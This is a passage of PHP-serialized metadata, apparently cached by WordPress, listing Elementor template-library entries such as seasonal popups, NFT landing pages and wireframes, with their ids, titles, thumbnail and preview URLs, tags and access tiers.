3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-1-Small.jpg\";s:12:\"tmpl_created\";i:1647857814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:94;a:20:{s:4:\"tmpl\";i:1378;s:2:\"id\";i:23416;s:5:\"title\";s:31:\"Fly-In | Discount | Halloween 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-5-Small.jpg\";s:12:\"tmpl_created\";i:1647858024;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-discount-halloween-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:44:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:95;a:20:{s:4:\"tmpl\";i:1379;s:2:\"id\";i:23422;s:5:\"title\";s:36:\"Classic | Subscription | Halloween 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-4-Small.jpg\";s:12:\"tmpl_created\";i:1647858246;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-halloween-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:48:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:96;a:20:{s:4:\"tmpl\";i:1380;s:2:\"id\";i:23471;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-2-Small.jpg\";s:12:\"tmpl_created\";i:1647859193;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:97;a:20:{s:4:\"tmpl\";i:1381;s:2:\"id\";i:23477;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-4-Small.jpg\";s:12:\"tmpl_created\";i:1647859838;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:98;a:20:{s:4:\"tmpl\";i:1382;s:2:\"id\";i:23483;s:5:\"title\";s:26:\"Fly-In | CTA | Christmas 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-1-Small.jpg\";s:12:\"tmpl_created\";i:1647860157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/fly-in-cta-christmas-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:99;a:20:{s:4:\"tmpl\";i:1383;s:2:\"id\";i:23489;s:5:\"title\";s:33:\"Slide-In | Discount | Christmas 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-5-Small.jpg\";s:12:\"tmpl_created\";i:1647860302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-christmas-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:100;a:20:{s:4:\"tmpl\";i:1384;s:2:\"id\";i:23496;s:5:\"title\";s:32:\"Classic | Discount | Christmas 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-3-Small.jpg\";s:12:\"tmpl_created\";i:1647860454;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-christmas-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Christmas\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:101;a:20:{s:4:\"tmpl\";i:1385;s:2:\"id\";i:23523;s:5:\"title\";s:30:\"Classic | CTA | Valentines Day\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-2-Small.jpg\";s:12:\"tmpl_created\";i:1647860912;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-valentines-day/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:102;a:20:{s:4:\"tmpl\";i:1386;s:2:\"id\";i:23529;s:5:\"title\";s:39:\"Hello Bar | Discount | Valentines Day 2\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-1-Small.jpg\";s:12:\"tmpl_created\";i:1647861064;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-discount-valentines-day-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:30:\"[\"Discount\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:103;a:20:{s:4:\"tmpl\";i:1387;s:2:\"id\";i:23536;s:5:\"title\";s:32:\"Classic | CTA | Valentines Day 3\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-3-Small.jpg\";s:12:\"tmpl_created\";i:1647861536;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-cta-valentines-day-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:104;a:20:{s:4:\"tmpl\";i:1388;s:2:\"id\";i:23586;s:5:\"title\";s:51:\"Fly-In | Subscribe | Health &#038; Wellness Company\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/35-Subscribe-Health-Wellness-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647862008;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscribe-health-wellness-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"Business\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:105;a:20:{s:4:\"tmpl\";i:1389;s:2:\"id\";i:23592;s:5:\"title\";s:34:\"Classic | Subscribe | Tech Company\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/36-Subscribe-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647866706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-subscribe-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:106;a:20:{s:4:\"tmpl\";i:1390;s:2:\"id\";i:23598;s:5:\"title\";s:36:\"Classic | Contact Us | Fight Classes\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/37-Contact-Us-Fight-Classes-Small.jpg\";s:12:\"tmpl_created\";i:1647866869;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-contact-us-fight-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:107;a:20:{s:4:\"tmpl\";i:1391;s:2:\"id\";i:23611;s:5:\"title\";s:31:\"Classic | CTA | Mochi Shop Sale\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2022/03/39-Click-Through-Mochi-Shop-Sale-Small.jpg\";s:12:\"tmpl_created\";i:1647867750;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-cta-mochi-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"cta\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:108;a:20:{s:4:\"tmpl\";i:1392;s:2:\"id\";i:23618;s:5:\"title\";s:28:\"Classic | CTA | Fashion Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/40-Click-Through-Fashion-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647868251;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:109;a:20:{s:4:\"tmpl\";i:1393;s:2:\"id\";i:23624;s:5:\"title\";s:29:\"Fly-In | Login | Tech Company\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/41-Login-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647868704;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/fly-in-login-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:110;a:20:{s:4:\"tmpl\";i:1394;s:2:\"id\";i:23630;s:5:\"title\";s:36:\"Fly-In | Verification | Liquor Store\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/42-Verification-Liquor-Store-Small.jpg\";s:12:\"tmpl_created\";i:1647870308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-verification-liquor-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:111;a:20:{s:4:\"tmpl\";i:1395;s:2:\"id\";i:23636;s:5:\"title\";s:39:\"Hello Bar | Subscribe | Online Magazine\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/44-Subscribe-Online-Magazine-Small.jpg\";s:12:\"tmpl_created\";i:1647870465;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-subscribe-online-magazine/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:112;a:20:{s:4:\"tmpl\";i:1396;s:2:\"id\";i:23642;s:5:\"title\";s:27:\"Fly-In | Login | Health Spa\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/43-Login-Health-Spa-Small.jpg\";s:12:\"tmpl_created\";i:1647872427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/fly-in-login-health-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Login\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:113;a:20:{s:4:\"tmpl\";i:1397;s:2:\"id\";i:23648;s:5:\"title\";s:33:\"Fly-In | Verification | Wine Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/45-Verification-Wine-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647872627;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/fly-in-verification-wine-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:114;a:20:{s:4:\"tmpl\";i:1421;s:2:\"id\";i:24235;s:5:\"title\";s:24:\"Ladydog Club &#8211; NFT\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/05/Ladydog_Club.jpg\";s:12:\"tmpl_created\";i:1651525072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/lp/ladydog-club-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:115;a:20:{s:4:\"tmpl\";i:1422;s:2:\"id\";i:24166;s:5:\"title\";s:15:\"Dot &#8211; NFT\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/05/Dot-250_280.jpg\";s:12:\"tmpl_created\";i:1651525117;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/lp/dot-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:116;a:20:{s:4:\"tmpl\";i:1423;s:2:\"id\";i:24191;s:5:\"title\";s:28:\"Cosmic Neighbors &#8211; NFT\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Cosmic_Neighbors-250_280.jpg\";s:12:\"tmpl_created\";i:1651525124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/cosmic-neighbors-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:117;a:20:{s:4:\"tmpl\";i:1424;s:2:\"id\";i:24255;s:5:\"title\";s:30:\"Happy Food Friends &#8211; NFT\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/05/Featured_Image.jpg\";s:12:\"tmpl_created\";i:1651525475;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/happy-food-friends-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:118;a:20:{s:4:\"tmpl\";i:1443;s:2:\"id\";i:24599;s:5:\"title\";s:27:\"Wireframe &#8211; Courses 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Courses-1.jpg\";s:12:\"tmpl_created\";i:1653989626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-courses-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:180:\"[\"About\",\"Academy\",\"Booking\",\"Business\",\"Course Online\",\"Features\",\"Footer\",\"Landing Pages\",\"Online Service\",\"Professional\",\"School\",\"Services\",\"Subscribe\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:119;a:20:{s:4:\"tmpl\";i:1444;s:2:\"id\";i:24614;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1-2.jpg\";s:12:\"tmpl_created\";i:1653990084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:139:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:120;a:20:{s:4:\"tmpl\";i:1445;s:2:\"id\";i:24629;s:5:\"title\";s:28:\"Wireframe &#8211; Services 